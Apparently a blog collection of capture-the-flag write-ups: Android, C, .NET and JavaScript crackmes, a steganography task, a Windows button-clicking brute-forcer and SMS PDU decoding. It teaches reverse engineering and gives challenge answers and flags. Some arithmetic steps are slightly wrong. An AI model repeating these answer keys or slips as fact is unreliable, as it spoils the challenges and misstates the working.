Key Logic:
if(k == (j1 ^ (0x67782aef ^ j1 ^ j - 1422) ^ j - 2))
    textview.append("That's OK. Come in.");
else
    textview.append("No, that is not OK!");

where
    k = inputs that user type
    j = 0x67782aef + 2
    j1 can be 12 from the code

More Information:
Decompiling the file reveals 2 java files in which only the AccessControl.java is of interest to us.
My approach in finding the condition in gaining access is to find the line where it indicates that you are “authorized”.
In this puzzle that will be “That’s OK. Come in.”
The If statement has a total of 3 unknown variables. After tracing upwards, you will discover that k is actually what the user type in the text box. J is defined as 0x67782aef + 2 and j1 can be either 12 or 3L * (16 + (0x67782aef - 2)) - 0x57bac1daL - 2L;

Let’s take the easy way out by letting j1 be 12. We write a 1 liner PHP script and run the result. Type in the emulator and test if it works.

Solution:
Run a php script =D


Result:
0x67782563
Screenshot:


Using the answer, we solved the Android CrackMe. :D

cheers
Elucidator

Wednesday, May 29, 2013

HackYou CTF 2012 : Binary - OpenSource

HackYou CTF 2012 : Binary - OpenSource

Hints given to us:


Choosing "Open-Source", we got a code.c file. Inside this .c file, we got the following source code.

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[]) {
    if (argc != 4) {
        printf("what?\n");
        exit(1);
    }

    unsigned int first = atoi(argv[1]);
    if (first != 0xcafe) {
        printf("you are wrong, sorry.\n");
        exit(2);
    }

    unsigned int second = atoi(argv[2]);
    if (second % 5 == 3 || second % 17 != 8) {
        printf("ha, you won't get it!\n");
        exit(3);
    }

    if (strcmp("h4cky0u", argv[3])) {
        printf("so close, dude!\n");
        exit(4);
    }

    printf("Brr wrrr grr\n");

    unsigned int hash = first * 31337 + (second % 17) * 11 + strlen(argv[3]) - 1615810207;

    printf("Get your key: ");
    printf("%x\n", hash);
    return 0;
}

Recommended Tools:
Brains
C Compiler

Solution to this challenge:
I've started solving this by analysing the source code.

...
if (argc != 4) {
...

Looking at the above code snippet, since "argc" must be 4. We know that it requires 3 arguments.


...
unsigned int first = atoi(argv[1]);
if (first != 0xcafe) {
    printf("you are wrong, sorry.\n");
    exit(2);
}
...

Now, the first argument is being converted to int and stored inside unsigned int, first.
Then the value of first is being compared to 0xcafe.
As 0xcafe is in hex, converting this to int means that argv[1] must be 51966.
In case you are wondering why did i confirm that, please read the documentation of atoi.

...
unsigned int second = atoi(argv[2]);
if (second % 5 == 3 || second % 17 != 8) {
    printf("ha, you won't get it!\n");
    exit(3);
}
...

Now, let's take a look at the 2nd argument.
It's being converted to int like the 1st argument and stored inside unsigned int, second.
The value that we want is that when divided by 5 must not have remainder 3 and when divided by 17 must have a remainder of 8.
Now's that's easy. Let's satisfy the 2nd condition. Since second divided by 17 must have a remainder of 8.
Thus, second must be 17+8 = 25
Ok, using 25 as the value of second. Let's check whether it satisfy the condition of the first one.
17%5=2
It satisfy the first condition as well as the remainder is 2.
Thus, we now know that argv[2] is 25

...
if (strcmp("h4cky0u", argv[3])) {
    printf("so close, dude!\n");
    exit(4);
}
....

Ok, looking at the documentation for strcmp.
We know that argv[3] must be h4cky0u

Now, you can either compile the above source code and feed in the arguments or you can manually calculate it.
I chose the latter option.

unsigned int hash = first * 31337 + (second % 17) * 11 + strlen(argv[3]) - 1615810207;
printf("Get your key: ");
printf("%x\n", hash);

Substituting all the arguments with the values that we have gotten. We got the following.
51966 * 31337 + (25%17)*11 + 7 - 1615810207
1628458542 + 88 - 7 - 1615810207
12648430

Since the final value of the hash is in hexadecimal, using calc to convert it.
The key is C0FFEE

cheers,
0x4a61636f62

pCTF 2011 : Mission 6 - Fun with Numb3rs (100 Points)

pCTF 2011 : Mission 6 - Fun with Numb3rs (100 Points)

Hints given to us:
Uh oh… This door is protected with number scroll authenticator. There's "powered by .NETv4" sign.
Find out the combination and get the key!

These are the original files:
D573190633309f8a930bccbd199a16a4564c35fb.zip
Readme_Fun_with_Numb3rs.txt

Recommended Tools:
Reflector Decompiler (http://www.reflector.net/); Decompile .net
Use SandBoxie (http://www.sandboxie.com/) to siam the 30 days trial

Key Logic behind cracking the mission:
if ((((((num + num4) - num2) + ((num * num) * num2)) - num3) == ((num2 * ((num3 * 0x22) + (num5 - num))) + 0x1d40)) && (num > 0x4d))

Brute force the logic:
for(int a = 78; a <= 255; a++){     for(int b = 0; b <= 255; b++){         for(int c = 0; c <= 255; c++){             if((a + b*c) - b + ((a*a*b) - c) == (b * ((c * 34) + ((3*a) - a)))+ 7488){                 System.out.println("a : " + a);                 System.out.println("b : " + b);                 System.out.println("c : " + c);             }         }     } }



Answer:
You will get the following results.
a : 89
b : 144
c : 233

Making use of the numbers
Since we got the 3 numbers, let's use it on the binary by adjusting the sliders like this.



After adjusting the sliders, you will get this messagebox, which is the key. :D



I have also attached the source code for the brute-force application.
File:Crack.java


cheers
Elucidator

NuitDuHack2013 Crackme 100 (Huge.js)

NuitDuHack2013 Crackme 100 (Huge.js)

A gigantic javascript file is given to us (about 25mb text file)
huge.zip

Recommended Tools:
- Notepad++
- Firefox Browser

Opening the file in Notepad++, we can see that it contains a function called "x" and a very long bunch of hexadecimal characters
The hexadecimal characters are most likely encoded javascript code and the function "x" is the decoding function

In order to decode the javascript code, we can create a html file and use the x function to help us decode the hexadecimal characters.
Something like this


Load the above html file into your browser (I used Firefox) and it should show you the decoded javascript code like this


Wait a minute, this looks exactly like the encoded code at the beginning of the puzzle.
This is because the javascript code is encoded multiple times and we need to decode it multiple times in order to get the original code
Copy the hexadecimal characters from the browser output and paste it back into the "abc" variable in the html file.
Reload the html file in the browser to run the decoding a second time.
Repeat this for 6 times and you will get the final actual javascript code


The actual code consists of multiple functions that perform hashing on the password.
There is also a function "unlock" which basically checks for a certain password hash.
Analyzing this function, we know that the password is 5 characters long and it can only contains a certain list of valid characters
With that, we can write a brute force function to brute force the password out


Run the brute force script in a browser and after awhile, it will give you the flag
(Do note that the brute force will take awhile, the browser may prompt you that the script is unresponsive. If it does, do not stop the script, ignore the warning or wait for the script to complete)
(For this, I recommend Firefox, as Firefox has the option of "Don't ask me again" which will save you a lot of waiting and clicking frustration)


Cheers,
thegrayone

NuitDuHack2013 Steganography 1

The question is:

"This time, take one LSB out of two, reverse the whole bit stream, add
a 0 every seven bits, uncompress, keep only one byte out of two and
you'll be done. Really."

We are given 2 attachments as attached.

bitmap.zip

Since it is only 1 point, it is
quite straight forward. Unzip the bitmap.zip, open up to view the
picture. The flag is written on the picture itself.

The flag is:
ffb19ff73f8268231392909c4b11ee56

Regards,
billa316

Padocon Qualifiers CTF 2010 : CatchMe - 200 Points

Padocon Qualifiers CTF 2010 : CatchMe - 200 Points

File given to us:
This is the original file:
CatchMeIfYouCan.zip


Recommended Tools:
Brains and Programming skills

Solving the Puzzle:
Let's fire up the binary which we are given.


Hmmmm...i can't seem to click on the button. I guess i have to click on the button in order to solve this.
As the button moved away whenever i placed my mouse cursor near it.
I guess i have to either reverse the application but i didn't want to spend too much time trying to reverse this application.

Thus, I've decided to make use of my development skills to solve this puzzle.

Logic behind this Solution:
Since moving my mouse cursor near the button will cause it to move away.

I've decided to send WM_LBUTTONDOWN (http://msdn.microsoft.com/en-us/library/windows/desktop/ms645607(v=vs.85).aspx) & WM_LBUTTONUP (http://msdn.microsoft.com/en-us/library/windows/desktop/ms645608(v=vs.85).aspx) messages with SendMessage function (http://msdn.microsoft.com/en-us/library/windows/desktop/ms644950(v=vs.85).aspx) to simulate the mouse cursor actions of clicking the button.

But in order to do that i need get the handle to CatchMeIfYouCan.exe.

So i've used FindWindow function (http://msdn.microsoft.com/en-us/library/windows/desktop/ms633499(v=vs.85).aspx) to look for "Catch Me If You Can!"
Then i get the area of the binary using GetClientRect function (http://msdn.microsoft.com/en-us/library/windows/desktop/ms633503(v=vs.85).aspx)

Brute-Force Logic:
#include<stdio.h>
#include<windows.h>
int main(int argc, char *argv[]){
    HWND hWnd;
    RECT rect1;
    hWnd = FindWindow(NULL,L"Catch Me If You Can!");
    GetClientRect(hWnd, &rect1);
    for( rect1.left = 0; rect1.left <= rect1.right ; rect1.left++ ){
        for( rect1.top = 0; rect1.top <= rect1.bottom ; rect1.top++ ){
            SendMessage(hWnd, WM_LBUTTONDOWN, 0, MAKELONG(rect1.left, rect1.top));
            SendMessage(hWnd, WM_LBUTTONUP, 0, MAKELONG(rect1.left, rect1.top));
        }
    }
}


Final Solution:
Once you have compiled the above code and get it to run. The button will stop moving and you can click on the button and you will be presented with a messagebox with the solution, "Zntus_WARTG_gAng"


I have attached the source code for the brute-force application so that you can try it on your own.


File:CatchMeIfYouCan.c


cheers
0x4a61636f62

ruCTF 2013 Mobile 100 The Big Squeeze

ruCTF 2013 Mobile 100 The Big Squeeze


The clue given is a txt file with a bunch of hexadecimal characters
sniffed.txt

Upon further research and considering this is in the mobile category, these lines are actually SMS PDU traffic

You can read more about the format on these 2 sites:
http://www.gsmfavorites.com/documents/sms/pdutext/
http://www.codeproject.com/Tips/470755/Encoding-Decoding-7-bit-User-Data-for-SMS-PDU-PDU

The main problem of this challenge is that SMS PDU converts 7-bit GSM message characters into 8-bit characters before transmitting them
The algorithm to decode them is described in the 2 links above

There is a tool available called "PDUSpy" which can be downloaded here
Use PDUSpy to decode each line in the text file
Eventually, you will get to one line which gives you the text as shown below


Take note of the UDH Elements portion
It shows that this text file actually contains a concatenated SMS with 254 parts
The lines in the text file are also not arranged in sequence.

The challenge now is to decode and rearrange the SMS parts according to the "SM sequence number" to recover the full SMS
Decoding a concatenated SMS is slightly different. Refer to the page below for an explaination
http://en.wikipedia.org/wiki/Concatenated_SMS

You could do it manually by decoding each line with PDUSpy and copying out the User Data (Text) portion to recover the SMS
OR you could write a script to do it
I wrote a php script that will decode the messages and saves them in a csv file (Do note that the conversion of 8 bit to 7 bit and the PDU format is a PITA to understand -_-)
After which, I used some excel magicks to re-arrange the SMS sequence and recover the full SMS
pduparser.php

Hey John. Here are the blueprints. Unfortunately my phone doesn't support MMS, so I had to find a workaround. 

The SMS contains a large chunk of encoded data
Decoding it with Base64 actually produces a png file


Yes, there is an image here, it has a transparent background and white lines, right click to download


Performing a google image search with that png will give you the flag "Hawker 4000"

Cheers,
thegrayone